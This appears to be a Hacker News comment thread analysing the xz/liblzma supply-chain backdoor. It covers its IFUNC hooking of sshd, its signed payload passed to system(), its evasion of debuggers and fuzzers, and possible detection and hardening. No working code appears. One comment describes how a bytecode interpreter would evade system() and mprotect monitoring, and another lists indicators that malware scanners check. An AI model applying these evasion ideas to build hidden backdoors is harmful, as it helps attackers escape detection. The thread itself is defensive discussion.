Except had we been doing that they would have put guards in place to detect it - as they already had guards to avoid the code path when a debugger is attached, to avoid building the payload in when it's not one of the target systems, and so on. Their evasion was fairly extensive, so we'd need many novel dynamic systems to stand a chance, and we'd have to guard those systems extremely tightly - the author got patches into oss-fuzz as well to "squash false positives". All in all, adding more arms to the arms race does raise the bar, but the bar they surpassed already demonstrated tenacity, long term thinking, and significant defense and detection evasion efforts.
I broadly agree, but I think we can draw a parallel with the arms race of new exploit techniques versus exploit protection.
People still manage to write exploits today, but now you must find an ASLR leak, you must chain enough primitives to work around multiple layers of protection, it's generally a huge pain to write exploits compared to the 90s.
Today the dynamic detection that we have for Linux packages seems thin to non-existent, like the arms race has not even started yet. I think there is a bit of low-hanging fruit to make attacker lives harder (and some much higher-hanging fruit that would be a real headache).
Luckily there is an asymmetry in favor of the defenders (for once). If we create a scanner, we do not _have_ to publish every type of scan it knows how to do. Much like companies fighting spammers and fraud don't detail exactly how they catch bad actors. (Or, for another example, I know the Tor project has a similar asymmetry to detect bad relays. They collaborate on their relay scanner internally, but no one externally knows all the details.)
This is an arms race that is largely won by attackers, actually. Sophisticated attacks are caught by them sometimes but usually the author has far more knowledge or cleverer tricks than the person implementing the checks, who is limited by their imagination of what they think an attacker might do.
Yeah, perhaps something akin to an OSS variant of virustotal's multi-vendor analysis. I'm still not sure it would catch this, but as you say, raising the bar isn't something we tend to regret.
If the prior is 1 was out there (this one), the chances that there is 1+ still undetected seems fairly high to me.
To behaviourally detect this requires many independent actors to be looking in independent ways(e.g. security researchers, internal teams). Edit: I mean with private code & tests (not open source, nor purchasable antivirus). It's not easy to donate to Google Zero. Some of the best funded and most skilled teams seem to be antivirus vendors (and high value person protection). I hate the antivirus industry yet I've been helped by it (the anti-tragedy of the commons).
Commonly public detection code (e.g. open source) is likely to be defeated by attackers with a lot of resources.
Hard to protect ourselves against countries where the individuals are safe from prosecution. Even nefarious means like assasination likely only work against individuals and not teams.
I think you’re saying “I would be surprised if there is only 1 exploit like this that already exists” which is what the previous comment was also saying. “If the prior is one” is often used to mean “we know for sure that there is one”.
> to try to overwrite symbols in other modules, to add LD audit hooks on startup, to try to resolve things manually by walking ELF structures
I want to name one thing: when Windows failed to load a DLL because a dependency was missing, it doesn't tell you what was missed. To get the information, you have to interact with the DLL loader with low level Windows APIs. In some circumstances Linux apps may also have the need. Like for printing a user friendly error message or recovery from a non-fatal error. For example, the patchelf tool that is used for building portable python packages.
> No one wants a Linux antivirus
It is not true. Actually these software are very popular in enterprise settings.
A cloud provider can take snapshots of running VMs then run antivirus scan offline to minimize the impact to the customers.
Similarly, many applications are containerized and the containers are stateless, we can scan the docker images instead. This approach has been quite mature.
In general, my gut feeling is that I expect the majority ClamAV installations to be configured to scan for Windows viruses in user submitted content. Email, hosting sites, etc.
To say nothing of enterprise EDR/XDR solutions that have linux versions. These things aren’t bulletproof but can be 1 layer in your multilayer security posture.
ClamAV also has a lot of findings when scanning some open source project's source code. For example, LLVM project's test data. Because some of the test data are meant to check if a known security bug is fixed, from a antivirus software perspective these data files can be seen as exploits. ClamAV is commonly used. Or, I would suggest adding it to every CI build pipeline. Most time it wouldn't have any finding, but it is better than nothing. I would like to offer free help if an open source project has the need to harden their build pipelines and their release process.
If you think about it this is a data-providence problem though. The exploit was hidden in "test" code which gets included in release code by compiler flags.
Now, if there was a proper chain of accountability for data, then this wouldn't have been possible to hide the way it is - any amount of pre-processing resulting in the release tarball including derived products of "test" files would be suspicious.
The problem is we don't actually track data providence like this - no build system does. The most we do is <git hash in> -> <some deterministic bits out>. But we don't include the human readable data which explains how that transform happens at enough levels.
You don’t need to go to that extent even - simply properly segregating test resources from dist resources would have prevented this, and that’s something Java has been doing for 20 years.
It’s not sufficient against a determined attacker, but it does demonstrate just how unserious the C world is about their build engineering.
I literally can’t think of a single time in 15 years of work that I’ve ever seen a reason for a dist build to need test resources. That’s at best a bug - if it’s a dist resource it goes in the dist resources, not test. And if the tooling doesn’t do a good job of making that mistake difficult… it’s bad tooling.
I'm really surprised they did a call to system() rather than just implement a tiny bytecode interpreter.
A bytecode interpreter that can call syscalls can be just a few hundred bytes of code, and means you can avoid calling system() (whose calls might be logged), and avoid calling mprotect to make code executable (also something likely to raise security red flags).
The only downside of a bytecode interpreter is the whole of the rest of your malware needs to be compiled to your custom bytecode to get the benefits, and you will take a pretty big performance hit. Unless you're streaming the users webcam, that probably isn't an issue tho.
I’ve been building Packj [1] to detect malicious PyPI/NPM/Ruby/PHP/etc. dependencies using behavioral analysis. It uses static+dynamic code analysis to scan for indicators of compromise (e.g., spawning of shell, use of SSH keys, network communication, use of decode+eval, etc). It also checks for several metadata attributes to detect bad actors (e.g., typo squatting).
The real problem was doing expensive math for every connection. If it had relied on a cookie or some simpler-to-compute pre-filter, no one would have been the wiser.
The slowdown is actually in the startup of the backdoor, not when it's actually performing authentication. Note how in the original report even sshd -h (called in the right environment to circumvent countermeasures) is slow.
Wow. Given the otherwise extreme sophistication this is such a blunder. I imagine the adversary is tearing their hair out over this. 2-3 years of full time infiltration work down the drain, for probably more than a single person.
As for the rest of us, we got lucky. In fact, it’s quite hilarious that some grump who’s thanklessly perf testing other people’s code is like “no like, exploit makes my system slower”.
Andres is one of the most prolific PostgreSQL committers and his depth of understanding of systems performance is second to none. I wouldn't have guessed he would one day save the world with it, but there you go.
That this was dynamically linked is the least interesting thing about it IMO. It was a long term I filtration where they got legitimate commit access to a well used library.
If xz was statically linked in some way, or just used as an executa Le to compress something (like the kernel), the same problems exist and no dynamic linking would need to be involved.
> If xz was statically linked in some way, or just used as an executa Le to compress something (like the kernel), the same problems exist and no dynamic linking would need to be involved.
even more so: all binaries dynamically linking xz can be updated by installing a fixed library version. For statically linked binaries: not so much, each individual binary would have to be relinked, good luck with that.
In exchange, each binary can be audited as a final product on its own merits, rather than leaving the final symbols-in-memory open to all kinds of dubious manipulation.
Not true, it would be much harder to hook into openssl functions if the final executable was static [1], the only way is that if the openssl function this attack targeted, actually called a function from libxz.
Dynamic loading is relic of the past and cause of many headaches in linux ecosystem, in this case it also just obfuscates the execution path of the code more so you can't really rely on the code you are reading. Unfortunately I don't think it's possible to completely get rid of dynamic loading as some components such as GPU drivers require it, but it should be reduced to minimum.
This particular approach of hooking would be much harder; but a malicious xz has other options as well.
It's already in the code path used by dpkg when unpacking packages for security updates, so it could just modify the sshd binary, or maybe add a rootkit to the next kernel security update.
It seems foolish to change our systems to stop one of the steps the attacker used after their code was already running as root; the attacker can just pick something else; as root they have essentially unlimited options.
True, but such code changes in xz would be much easier to audit than all the dynamic loading shenanigans, even if obfuscated in the build system. The GNU's dynamic loader specially has grown to be very complicated (having all these OOP-like polymorphism features on linker / loader level ...) and I think we should tone down the usage of dynamic linking as I see it as low hanging fruit for attacks in general.
There are other reasons to change, though. The main thing to consider here is that static linking is the "OG" way of doing things, and also the simplest and the most easily understandable one. There are also obvious perf benefits to it when it comes to optimizing compilers.
On the other hand, dynamic linking was originally more or less just a hack to deal with memory-restricted environments in the face of growing amounts of code. It was necessary at the time because we simply wouldn't have things like X or Windows without it way back when.
But RAM is nowhere near as sparse these days, and it could be even less so if there was a concerted push on hardware vendors to stop skimping on it. So why don't we remove the hack and get back to a simple model that is much easier to understand, implement, and audit?
agree, it’s difficult to believe that people believe in dynamic linking so strongly that they are unwilling to consider abandoning it even in the face of obvious problems like this xz situation
Looking at IFUNC, there never seems to be a reason to allow function loading from a different library than the one the call is in, right? Maybe a restriction like that could be built in. Or just explicitly enumerate the possible substitutions per site.
IFUNC isn't used directly to patch the functions of another library here, it's just the entry point for the exploit code. IFUNC is used as opposed to other ways to execute code on library load because it runs very early (before linking tables are remapped read-only).
Yes, the dynamic linker (/lib/ld-linux.so.2), which is one relatively short program as opposed to thousands of big ones. :)
The point is, there's simply no usecase to require or even allow the program to do IFUNC substitution freely on its own. A programming framework should not opt the developer in to capabilities they don't want or need. Much of C-likes' complexity arises from unnecessary, mandated capabilities.
I mean dynamic loader is part of the base system and you generally trust the compiler and linker you build the program with. If any of those are malicious, you've already lost the game.
Asking a programmer to trust his own compiler and libraries which he can personally analyze and vouch for (static linking) is much different than asking the programmer to vouch for the dynamic libraries present on some given user’s machine.
Think whatever you shall about systemd of course, but please stop with the blind belief mud slinging:
- systemd didn't create the patch to include libsystemd, distros did
- current systemd versions already remove liblzma from their dependencies, the affected distros are behind on systemd updates though
- you can implement notify in standalone code in about the same effort as it takes to use the dependency, there wasn't really a good reason for distro's to be adding this dependency to such a critical binary. systemd documents the protocol independently to make this easy. distros having sketchy patches to sshd has a long history, remember the debian weak key fiasco?
I wonder if the fact they "had" to use a dependency and jump through a number of hoops suggest they're not involved in the conspiracy? As if they had this sort of access and effort surely systemd itself would be an easier target?
But that's not saying this is the only conspiracy, maybe there's hundreds of other similar things in published code right now, and one was noticed soon after introduction merely due to luck.
I'm not bitter, I'm wary of systemd in a security context. Their vulns seem to be a result of poor choices made deliberately rather than mistakes or sloppy coding (e.g. defaulting to running units as root when the UID/username couldn't be parsed). Lennart was staunchly anti-CVE, which to me seems again like making a deliberate choice that will only hinder a secure implementation.
I haven't followed systemd too closely, has their stance on CVEs at least evolved?
I think this would’ve been difficult to catch because the patching of sshd happens during linking, when it’s permissible, and if this is correct then it’s not a master key backdoor, so there is no regular login audit trail. And sshd would of course be allowed to start other processes. A very tight SELinux policy could catch sshd executing something that ain’t a shell but hardening to that degree would be extremely rare I assume.
As for being discovered outside the target, well we tried that exercise already, didn’t we? A bunch of people stared at the payload with valgrind et al and didn’t see it. It’s also fairly well protected from being discovered in debugging environments, because the overt infrastructure underlying the payload is incompatible with ASan and friends. And even if it is linked in, the code runs long before main(), so even if you were prodding around near or in liblzma with a debugger you wouldn’t normally observe it execute.
e: sibling suggests strace, yes you can see all syscalls after the process is spawned and you can watch the linker work. But from what I’ve gathered the payload isn’t making any syscalls at that stage to determine whether to activate, it’s just looking at argv and environ etc.
One idea may be to create a patched version of ld-linux itself with added sanity checks while the process loads.
For something much more heavy-handed, force the pages in sensitive sections to fault, either in the kernel or in a hypervisor. Then look at where the access is coming from in the page fault handler.
I don't think you can reliably differentiate a backdoor executing a command, and a legitimate user logged in with ssh running a command once the backdoor is already installed. But the way backdoors install themselves is where they really break the rules.
Since a liblzma backdoor could be used to modify compiler packages that are installed on some distributions, it gets right back to a trusting trust attack.
Although initial detection via eg strace would be possible, if the backdoor was later removed or went quiescentit would be full trusting trust territory.
How would this be possible? This backdoor works because lzma is loaded into sshd (by a roundabout method involving systemd). I don't think gcc or clang links lzma.
To be fair neither does sshd. But I'm sure someone somewhere has a good reason for gcc to write status via journald or something like that? There's however no reason to limit yourself to gcc for a supply chain attack like this.
In any non trivial build system, there's going to be lots of third party things involved. Especially when you include tests in the build. Is Python invoked somewhere along the build chain? That's like a dozen libraries loaded already.
Nothing is gained from protecting against an exact replica of this attack, but from this family of attacks.
At least for some comic relief I'd like to imagine Jia's boss slapping him and saying something like "you idiot, we worked on this for so many years and you couldn't have checked for any perf issues?"
But seriously, we could have found ourselves with this in all stable repos: RHEL, Debian, Ubuntu, IoT devices 5 years from now and it would have been a much larger shit show.
This was the backdoor we found. We found the backdoor with performance issues.
Whats more likely - that this is the only backdoor like this in linux, or that there are more out there and this is the one we happened to find?
I really hope someone is out there testing for all of this stuff in linux:
- Look for system() calls in compiled binaries and check all of them
- Look for uses of IFUNC - specifically when a library uses IFUNC to replace other functions in the resulting executable
- Make a list of all the binaries / libraries which don't landlock. Grep the sourcecode of all those projects and make sure none of them expect to be using landlock.
We have governments, which even in the face of budget crises and such tend to allocate enormous sums for "national security". Why not have them actually do something useful with that for once and do a manual line-by-line audit of all security-critical code that is underpinning our infrastructure?
ifunc was only used because it’s an obscure feature that is little-used and provides a way to convert a backdoor into easy execution. There are many others and it would be silly to try to catch them all.
Absolutely no intelligence agency would look at a successful compromise where they have a highly positioned agent in an organization like this, and burn them trying to rush an under-developed exploit in that would then become not useful almost immediately (because the liblzma dependency would be dropped next distro upgrade cycle).
If you had a human-asset with decision making authority and trust in place, then as funded organization with regular working hours, you'd simply can the project and start prototyping new potential uses.
Might a time-sensitive high-priority goal override such reasoning? For example, the US presidential election is coming up. Making it into Ubuntu LTS could be worth the risk if valuable government targets are running that.
Jia Tan tried to get his backdoored XZ into Ubuntu 24.04 just before the freeze, so that makes sense. Now is about the right time to get it into Fedora if he wants to backdoor RHEL 10, too.
But I don't think valuable government targets are in any hurry to upgrade. I wouldn't expect widespread adoption of 24.04, even in the private sector, until well after the U.S. election.
By the next election, though, everyone will be running it.
Edit: According to another comment [1], there would only have been a short window of vulnerability during which this attack would have worked, due to changes in systemd. This might have increased pressure on the attacker to act quickly.
> But seriously, we could have found ourselves with this in all stable repos: RHEL, Debian, Ubuntu, IoT devices 5 years from now and it would have been a much larger shit show.
Think about backdoors that are already present and will never be found out.
Probably the FBI for the public part of it, but if this wasn't a US owned operation you can be sure the CIA/NSA/military will do their own investigation.
> It's not actually unusual for three-letter US agencies to be at odds with one another.
I'd noticed that; this seems to have been the case for a long time. You'd think that having state security agencies at war with one-another would be a disaster, but perhaps it's a feature: a sort of social "layered security". At any rate, it seems much better than having a bunch of state security agencies that all sing from the same songsheet.
It's a bog standard practice, actually, even if you look very far back to the ancient world. Having a single agency responsible for security of yourself and what you own is a bad idea because no matter how much you try ensure the loyalty of people in it, it's prone to, at the minimum, suppressing its own failures and magnifying its successes to make itself look better than it actually is, giving you a false sense of security. It is also the natural point from which to orchestrate a coup, which is something that can be used by your adversaries, but even without their involvement people working there eventually realize that they hold all the keys to the kingdom and there's little risk in them just taking over.
So rulers in all ages tended to create multiple different security apparatuses for themselves and their states, and often actively encouraged rivalries between them, even if that makes them less efficient.
Backdoors can be placed in any type of software. For example, a GIMP plugin could connect to your display and read keystrokes, harvest passwords, etcetera. Utilities run by the superuser are of course even more potentially dangerous. Supply-chain attacks like these are just bound to happen. Perhaps not as often in SSH which is heavily scrutinized, but the consequences can be serious nevertheless.
Can I ask for why it wouldn't have been discovered if the obvious delay wasn't present? Wouldn't anyone profiling a running sshd (which I have to imagine someone out there is doing) see it spending all its crypto time in liblzma?
The situation certainly wouldn't be helped by the fact that this exploit targeted the systemd integration used by Debian and Red Hat. OpenSSH developers aren't likely to run that since they already rejected that patch for the increased attack surface. Hard to argue against, in retrospect. The attack also avoids activation under those conditions a profiler or debugger would run under.
Using a jump host could help, only allowing port forwarding. Ideally it would be heavily monitored and create a new instance for every connection (e.g., inside a container).
The attacker would then be stuck inside the jump host and would have to probe where to connect next. This hopefully would then trigger an alert, causing some suspicion.
A shared instance would allow the attacker to just wait for another connection and then follow its traces, without risking triggering an alert by probing.
The ideal jump host would allow to freeze the running ssh process on an alert, either with a snapshot (VM based) or checkpointing (container based), so it can be analyzed later.
Make absolutely sure to include `-a` so it doesn't nuke your env file, and generally speaking, one should upgrade to a version without the malicious code and restart, of course.
i wonder if the malicious code would've installed a more permanent backdoor elsewhere that would remain after a restart.
I recall things like on windows where malware would replace your keyboard drivers or mouse drivers with their own ones that had the malware/virus, so that even if the original malware is removed, the system is never safe again. You'd have to wipe. And this is not even counting any firmware that might've been dropped.
This is a good example of bad logic. It doesn't reek of anything except high quality work. You have an unacknowledged assumption that only nation state actors are capable of high quality work. I think that ultimately you want it to be nation state actors and therefore you see something that a nation state actor would do, so you backtrack that it is a nation state actor. So logically your confirmation bias leads you to affirm the consequent.
I only say this because I'm tired of seeing the brazen assertions of how this has to be nation state hackers. It is alluring to have identified a secret underlying common knowledge. Thats why flat-earthers believe theyve uncovered their secret, or chem trail believers have identified that secret, or vaxxers have uncovered the secret which underlies vaccines. But the proof just isn't there. Dont fall into the trap they fell into.
Can someone explain succinctly what the backdoor does? Do we even know yet? The backdoor itself is not a payload, right? Does it need a malicious archive to exploit it? Or does it hook into the sshd process to listen for malicious packets from a remote attacker?
The OP makes it sound like an attacker can send a malicious payload in the pre-auth phase of an SSH session - but why does he say that an exploit might never be available? Surely if we can reverse the code we can write a PoC?
Basically, how does an attacker control a machine with this backdoor on it?
You can imagine a door that opens if you knock on it just right. For anyone without the secret knock, it appears and functions as a wall. Without the secret knock, there might not even be a way to prove it opens at all.
This is sort of the situation here. xz tries to decode some data before it does anything shady; since it is asymmetric; it can do the decryption without providing the secret encryption key (it has the public counterpart).
The exploit code may never be available, because it is not practical to find the secret key, and it doesn't do anything obviously different if the payload doesn't decrypt successfully. The only way to produce the exploit code would be if the secret key is found somehow; and the only real way for that to happen would be for the people who developed the backdoor to leak it.
Private key. In cryptography we distinguish keys which are symmetric (needed by both parties and unavailable to everyone else) as "Secret" keys, with the pair of keys used in public key cryptography identified as the Private key (typically known only to one person/ system/ whatever) and Public key (known to anybody who cares)
Thus, in most of today's systems today your password is a secret. You know your password and so does the system authenticating you. In contrast the crucial key for a web site's HTTPS is private. Visitors don't know this key, the people issuing the certificate don't know it, only the site itself has the key.
I remember this by the lyrics to "The Fly" by the band U2, "They say a secret is something you tell one other person. So I'm telling you, child".
I don't think I can take seriously in this context a quote in which certificates (a type of public document) are also designated "secrets".
Like, sure, they're probably thinking of PKCS#12 files which actually have the private key inside them, not just the certificate, but when they are this sloppy of course they're going to use the wrong words.
I have often seen the secret component of an asymmetric key pair referred as secret key as well. See libsodium for example. Maybe it's because curve/ed 25519 secrets are 32 random bytes unlike RSA keys which have specific structure which makes them distinct from generic secrets.
> You know your password and so does the system authenticating you.
Nitpick, but no it shouldn’t.
The HASH of your password is recorded. You never submit your password, you submit that hash and they compare it.
The difference is that there is no two passwords that collide; but there are hashes that may.
And that two equal passwords from two equal users are not necessarily accessible to someone with the hash list because they are modified at rest with salts.
To really nitpick the server does have the password during authentication. The alternate would be a PAKE which is currently quite rare. (But probably should become the standard)
I am aware of PAKEs, and I decided not to waste my time mentioning them because as usual the situation is:
Using a PAKE correctly would be safe, but that sounds like work
Just saying "Use a good password" is no work and you can pretend it's just as safe.
Real world systems using a PAKE are very rare. The most notable is WPA3 (and there are numerous scenarios where it's for nothing until WPA2 is long obsolete). Lots of systems which would use a PAKE if designed by a cryptographer were instead designed by engineers or managers for whom "Ooh, a hash with salt" sounds like a sophisticated modern technical solution rather than a long obsolete one.
> You never submit your password, you submit that hash and they compare it.
That's not true. If that were the case, the hash is now the password and the server stores it in clear text. It defeats the entire purpose of hashing passwords.
Side note: that is (almost) how NTLM authentication works and why pass-the-hash is a thing in Windows networks.
> Nitpick, but no it shouldn’t.
The HASH of your password is recorded. You never submit your password, you submit that hash and they compare it.
Nitpick, but the password is submitted as-is by most client applications, and the server hashes the submitted password and compares it with the hash it has (of course, with salting).
> Nitpick, but the password is submitted as-is by most client applications, and the server hashes the submitted password and compares it with the hash it has (of course, with salting).
I never understood why clients are coded this way. It's trivially easy to send the salt to the client and have it do the hashing. Though I guess it doesn't really improve security in a lot of cases, because if you successfully MITM a web app you can just serve a compromised client.
> I never understood why clients are coded this way.
Because it makes things less secure. If it was sufficient to send the hash to the server to authenticate, and the server simply compares the hash sent by the user with the hash in its database, then the hash as actually the password. An attacker doesn't need to know the password anymore, as the hash is sufficient.
Hashing was introduced precisely because some vulnerabilities allow read access to the database. With hashed passwords, the attacker in such a situation has to perform a password guessing attack first to proceed. If it was sufficient to send the hash for authentication, the attacker would not need to guess anything.
I could be wrong, buy my understanding is that it isn't even a door. It simply allows anyone that has a certain private key, to send a payload that the server will execute. This won't produce any audit of someone logging in, you won't see any session etc.
Any Linux with this installed would basically become a bot that can be taken over. Perhaps they could send a payload to make it DDoS another host, or payload to open a shell or payload that would install another backdoor with more functionality, and to draw attention away from this one.
It looks like the exploit path calls system() on attacker supplied input, if the check passes. I don't think we need to go into more detail than "it does whatever the attacker wants to on your computer, as root".
In a way this is really responsible backdoor. In the end this is even less dangerous than most unreported 0-days collected by public and private actors. Absurdly, I would feel reasonably safe with the compromised versions. Somebody selling botnet host would never be so careful to limit collateral damage.
I understand that we may never see the secret knock but shouldn't we have the door and what's behind it now? Doesn't this mean that the code is quite literally too hard to figure out for a human being? It's not like he can send a full new executable binary that he simply executes, then we'd see that the door is e.g the exec() call. Honestly this attempt makes me think that the entire c/c++ language stack and ecosystem is the problem. All these software shenanigans should not be needed in a piece of software like openssh but it's possible because it's written in c/c++.
Nothing here is something that could not be done in other languages. For example in Rust auditing this kind of supply chain attack is even more nightmarish if the project uses crates, as crates often are very small causing the "npm effect".
Another good example is docker images. The way people often build docker images is not that they are build all the way from the bottom. The bottom layer(s) is/are often some arbitrary image from arbitrary source which causes a huge supply chain attack risk.
All analogies are flawed, and we are rapidly approaching the point of madness.
Still, let me try. In this case, someone on the inside of the building looked in a dusty closet and saw a strange pair of hinges on the wall of the closet. Turns out that the wall of the closet is an exterior wall adjoining the alley back behind the building! At least they know which contractor built this part of the building.
Further examination revealed the locking mechanism that keeps the secret door closed until the correct knock is used. But because the lock is based on the deep mathematics of prime numbers, no mere examination of the lock will reveal the pattern of locks that will open it. The best you could do is sit there and try every possible knocking pattern until the door opens, and that would take the rest of your life, plus the rest of the lifetime of the Earth itself as well.
Incidentally, I could write the same exploit in rust or any other safe language; no language can protect against a malicious programmer.
As for detecting use of the back door, that's not entirely out of the question. However it sounds like it would not be as easy as logging every program that sshd calls exec on. But the audit subsystem should notice and record the activity for later use in your post–mortem investigation.
This is literally what the top post link is about. The backdoor functionality has been (roughly) figured out: after decryption and signature verification it passes the payload received in the signing key of the clients authentication certificate to system().
C/C++ is not a problem here because sshd has to run things to open sessions for users.
The payload is simply remote code execution. But we'll never know the secret knock that triggers it, and we can't probe existing servers for the flaw because we don't konw the secret knock.
I imagine that we could in short order build ourselves a modified version of the malware, which contains a different secret knock, one that we know in advance, and then test what would have happened with the malware when the secret knock was given. But this still doesn't help us probe existing servers for the flaw, because those servers aren't running our modified version of the malware, they're running the original malware.
> Honestly this attempt makes me think that the entire c/c++ language stack and ecosystem is the problem. All these software shenanigans should not be needed in a piece of software like openssh but it's possible because it's written in c/c++.
Nothing about this relies on a memory safety exploit. It's hard to figure out because it's a prebuilt binary and it's clever. Unless you meant "all compiled languages" and not C/C++ specifically, it's irrelevant.
The right thing to argue against based on your instinct (no one can figure out what is going on) is: it should be unacceptable for there to be prebuilt binaries committed to the source code.
The "stuff behind the door" is conveniently uploaded with the secret knock. It's not there and it will never be because it's remotely executed without getting written down. The attacker does send executable code, singed and encrypted (or only one of them? It does not matter) with their private key. The door checks anything incoming for a match with the public key it has and executes when happy.
C++ has nothing to do with this, it's the dynamic linking mechanism that allows trusted code the things it allows trusted code to do (talking about the hooking that makes the key check possible, not about the execution that comes after - that is even more mundane, code can execute code, it's a von Neumann architecture after all).
It's not too hard to figure out. People are figuring it out. If anything is too hard, it's due to obfuscation - not C/C++ shenanigans.
As far as I understand from scrolling through these comments, an attacker can send a command that is used with the system() libc call. So the attacker basically has a root shell.
The people who are busy inserting backdoors in all the "rewrite it in rust" projects where anonymous never heard from before new to programming randos rewrite long trusted high security projects in rust would presumably very much like everyone elses attention directed elsewhere.
It's okay, the Cargo Lords promise me that because they require a git-hub account and agreeing to the git-hub terms of service before contributing, everything will be okay.
1. sshd starts and loads the libsystemd library which loads the XZ library which contains the hack
2. The XZ library injects its own versions of functions in openssl that verify RSA signatures
3. When someone logs into SSH and presents a signed SSH certificate as authentication, those hacked functions are called
4. The certificate, in turn, can contain arbitrary data that in a normal login process would include assertions about username or role that would be used to determine if the certificate is valid for use logging in as the particular user. But if the hacked functions detect that the certificate was signed by a specific attacker key, they take some subfield of the certificate and execute it as a command on the system in the sshd context (ie, as the root user).
Unfortunately, we don’t know the attacker’s signing key, just the public key the hacked code uses to validate it. But basically this would give the attacker a way to run any command as root on any compromised system without leaving much of a trace, beyond the (presumably failed) login attempt, which any system on the internet will be getting a lot of anyway.
Is there really a failed login attempts? If it never calls the real functions of ssh in case of their own cert+payload why would sshd log anything or even register a login attempt? Or does the backdoor function hook in after sshd already logged stuff?
I think it would depend on logging level, yeah. I’ve not seen one way or another whether it aborts the login process or prevents logging, but that’s possible, and would obviously be a good idea. Then the question would be if you could detect the difference between a vulnerability-aborted login attempt and just a malformed/interrupted login attempt.
But in the case of this specific attack, probably the safest approach would be to watch and track what processes are being spawned by sshd. Which in retrospect is probably advisable for any network daemon. (Of course, lots of them will be sloppy and messy with how they interact with the system and it might be next to impossible to tell attacks from “legit” behavior. But sshd is probably easier to pin down to what’s “safe” or not.
> When someone logs into SSH and presents a signed SSH certificate as authentication, those hacked functions are called
So if I only use pubkey auth and ED25519, there's no risk?
Besides this, just to understand it better, if someone tries to login to your server with the attacker's certificate, the backdoor will disable any checks for it and allow the remote user to login as root (or any other arbitrary user) even if root login is disabled in sshd config?
I don’t think we know enough to be sure even disabling certificate auth would prevent this. But from what I can tell it probably wouldn’t directly allow arbitrary user login. It only seems to allow the execution of an arbitrary command. But of course that command might do something that would break any other security on the system.
But, one clever thing about this attack is that the commands being run wouldn’t be caught by typical user-login tracking, since there’s no “login”. The attacker is just tricking sshd into running a command.
I don't think we know what exactly this does, yet. I can only answer one of those questions, as far as I understand the "unreplayable" part is refering to this:
> Apparently the backdoor reverts back to regular operation if the payload is malformed or *the signature from the attacker's key doesn't verify*.
emphasis mine, note the "signature of the attacker's key". So unless that key is leaked, or someone breaks the RSA algorithm (in which case we have far bigger problems), it's impossible for someone else (researcher or third-party) to exploit this backdoor.
Replayability means something different in this context. First, we do know the backdoor will pass the payload to system, so in general it is like an attacker has access to bash, presumably as root since it is sshd.
Replayability means, if someone were to catch a payload in action which did use the exploit, you can’t resend the attacker’s data and have it work. It might contain something like a date or other data specific only to the context it came from. This makes a recorded attack less helpful for developing a test… since you can’t replay it.
> It might contain something like a date or other data specific only to the context it came from.
In all these modern protocols, including SSHv2 / SecSH (Sean Connery fans at the IETF evidently) both parties deliberately introduce random elements into a signed conversation as a liveness check - precisely to prevent replaying previous communications.
TLS 1.3's zero round-trip (ORT) mode cannot do this, which is why it basically says you'd better be damn sure you've figured out exactly why it's safe to use this, including every weird replay scenario and why it's technically sound in your design or else you must not enable it. We may yet regret the whole thing and just tell everybody to refuse it.
What could be done, I think, is patch the exploit into logging the payload (and perhaps some network state?) instead of executing it to be able to analyse it. Analyse it, in the unlikely case that the owner of the key would still try their luck using it after discovery, on a patched system.
What it does: it's full RCE, remote code execution, it does whatever the attacker decides to upload. No mystery there.
it does whatever the decrypted/signed payload tells the backdoor to execute - it's sent along with the key.
The backdoor is just that - a backdoor to let in that payload (which will have come from the attacker in the future when they're ready to use this backdoor).
Or very untargeted. Something intended just to lay dormant by chance if succeeded...
It is very good backdoor to have if you at whatever time have dozens of options. See sshd running, test this you are done if it works, if not move to something else.
This looks like state sponsored attack. Imagine having a backdoor that you can just go to any Linux server and with your key you can make it execute any code you wish without any audit trail. And no one without the key can do it, so even if your citizens use such vulnerable system other states won't be able to use your backdoor.
My understanding is that we know somehow already what the exploit allows the attacker to do - we just can't reproduce it because we don't have their private key.
Technically, we can modify the backdoor and embed our own public key - but there is no way to probe a random server on the internet and check if it's vulnerable (from a scanner perspective).
In a certain way it's a good thing - only the creator of the backdoor can access your vulnerable system...
It's a NOBUS (Nobody But Us can use it) attack. The choice to use a private key means it's possible that even the person who submitted the tampered code doesn't have the private key, only some other entity controlling them does.
I know what replayable means. But even with your explanation of what makes it unreplayable it's not strictly true: you could replay the attack on the server it was originally played against.
Sure. But the interest is in being able to talk to server B to figure out if it's vulnerable; that's impossible, because the attack can't be replayed to it.
> The OP makes it sound like an attacker can send a malicious payload in the pre-auth phase of an SSH session - but why does he say that an exploit might never be available? Surely if we can reverse the code we can write a PoC?
Not if public-key cryptography was used correctly, and if there are no exploitable bugs.
We understand it completely. However, since determining the private key that corresponds to the public key embedded in the backdoor is practically infeasible, we can't actually exercise it. Someone could modify the code with a known ed448 private key and exercise it, but the point of having the PoC is to scan the internet and find vulnerable servers.
> The OP makes it sound like an attacker can send a malicious payload in the pre-auth phase of an SSH session - but why does he say that an exploit might never be available?
The exploit as shipped is a binary (cleverly hidden in the test data), not source. And it validates the payload vs. a private key that isn't known to the public. Only the attacker can exercise the exploit currently, making it impossible to scan for (well, absent second order effects like performance, which is how it was discovered).
That's the most interesting part. No, we don't know it yet. The backdoor is so sophisticated that none of us can fully understand it. It is not a “usual” security bug.
What makes you say that? I haven't started reverse engineerinng it myself, but from all I have read, people who did have a very good understanding of what it does. They just can't use it themselves, because they would need to have the attacker's private key.
Yeah these types of security issues will be used by politicians to force hardware makers to lockdown hardware, embed software in chips.
The go fast startups habit of “import the world to make my company products” is a huge security issue IT workers ignore.
The only solution politics and big tech will chase is obsolete said job market by pulling more of the stack into locked down hardware, with updates only allowed to come from the gadget vendor.
Like you said it has firmware which is flashable. Secure enclaves are never 100% secure but if only, for example, Apple can upload to them, it dramatically reduces some random open source project being git pulled. Apple may still pull open source but they would be on the hook to avoid this.
Open sources days of declaring “use at your risk” have become a liability in this hyper networked society. It’s now becoming part of the problem it was imagined up to solve.
The NSA demands that Intel and AMD provide backdoor ways to turn off the IME/PSP, which are basically a small OS running in a small processor inside your processor. So the precedent is that the government wants less embedded software in their hardware, at least for themselves.
If we relied on gadget vendors to maintain such software, I think we can just look at any IoT or router manufacturer to get an idea of just how often and for how long they will update the software. So that idea will probably backfire spectacularly if implemented.
IME has privileged access to the MMU(s), all system memory, and even out-of-band access to the network adapter such the the OS cannot inspect network traffic originating with or destined for the IME.
Lots. It's basically an extra processor that runs at all times, even when your computer is supposedly "off." Its firmware is bigger than you'd think, like a complete Unix system big. It's frankly terrifying how powerful and opaque it is. It provides a lot around remote management for corporations, lots of "update the BIOS remotely" sort of features, and also a bunch of those stupid copy protection enforcement things. Plus some startup/shutdown stuff like Secure Boot.
Why would "embed software in chips" be a solution?
